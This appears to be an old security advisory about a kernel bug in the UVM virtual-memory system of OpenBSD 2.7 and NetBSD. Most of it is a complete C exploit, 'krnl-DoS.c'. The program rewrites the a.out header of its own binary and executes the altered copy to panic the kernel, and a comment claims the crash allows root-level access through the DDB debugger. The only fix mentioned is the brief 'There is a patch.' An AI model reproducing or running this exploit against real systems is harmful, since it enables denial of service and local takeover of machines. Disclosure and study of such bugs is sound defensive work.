COMMAND

    kernel

SYSTEMS AFFECTED

    OpenBSD 2.7, NetBSD

PROBLEM

    Anonymous source  found following.   UVM is  a new  virtual memory
    system developed which  is currently used  in the OpenBSD.   It is
    significantly better than the traditional MACH based VM.

    The bug exists  in the anonymous  mapping code in  UVM.  This  bug
    allows for  any local  user (or  remote user)  to crash the entire
    OpenBSD system, rendering it completely useless.  Once the  system
    has crashed,  a local  user (with  access to  the terminal) may in
    fact hack the system.   The system drops into  DDB (man it).   DDB
    allows for debugging of the actual kernel.

    Basically,  if  the  (sz  &  (PAGE_SIZE-1))  is  true,  the kernel
    panic()'s.  Here is the xploit:

    // PUBLIC RELEASE
    //
    // krnl-DoS.c by RLoxley of Team Hackphreak (#hackphreak on unet) & SSG
    //
    // This exploit is proof of concept code. It exploits the UVM bug in
    // all OpenBSD kernels. It can also be used to gain god access via
    // ddb during the crash recovery phase of OpenBSD's security structure.
    //
    // Greets: #hackphreak, RootShellHackers, ZSH (#!/bin/zsh), EHAP,
    //         Condemnation, caddis[TESO], Solar Designer, gov-boi,
    //         #darknet, ISS, #conf, Al Hugher, Aleph1, shinex (for porting)
    //	   SSG, www.subterrain.net
    //
    // PS: The exploit is broke very slightly, so this takes some knowledge
    //
    // PUBLIC RELEASE
    
    
    #include <stdio.h>
    #include <errno.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>
    #include <a.out.h>
    #include <fcntl.h>
    #include <sys/types.h>
    
    #define CRASH_FILE "./f0rKb0mB"
    
    extern int      errno;
    
    int
    main(int argc, char *argv[])
    {
    struct exec    *ehdr;
    struct stat     statbuf;
    int             fd;
    unsigned char  *data;
    
    
       fd = open(argv[0], O_RDONLY);
       if (fd < 0)
       {
    perror("main() : open(argv[0]) ");
    exit(-1);
       }
    
       if (fstat(fd, &statbuf) < 0)
       {
    perror("main() : fstat() ");
    exit(-1);
       }
    
       data = (unsigned char *) malloc(statbuf.st_size);
       if (data == NULL)
       {
    perror("main() : malloc() ");
    exit(-1);
       }
    
       if (read(fd, data, statbuf.st_size) <= 0)
       {
    puts("main() : read() Failure");
    exit(-1);
       }
    
       ehdr = (struct exec *) data;
    
       close(fd);
    
       unlink(CRASH_FILE);
    
       fd = open(CRASH_FILE, O_RDWR | O_CREAT, S_IXUSR);
       if (fd < 0)
       {
    perror("main() : open(CRASH_FILE) ");
    exit(-1);
       }
    
       ehdr->a_data += 3;
    
       if (write(fd, data, statbuf.st_size) < 0)
       {
    perror("main() : write() ");
    exit(-1);
       }
    
       close(fd);
    
       if (execlp(CRASH_FILE, NULL) < 0)
       {
    perror("main() : execlp() ");
    exit(-1);
       }
    
       return (0);
    }

SOLUTION

    There is a patch.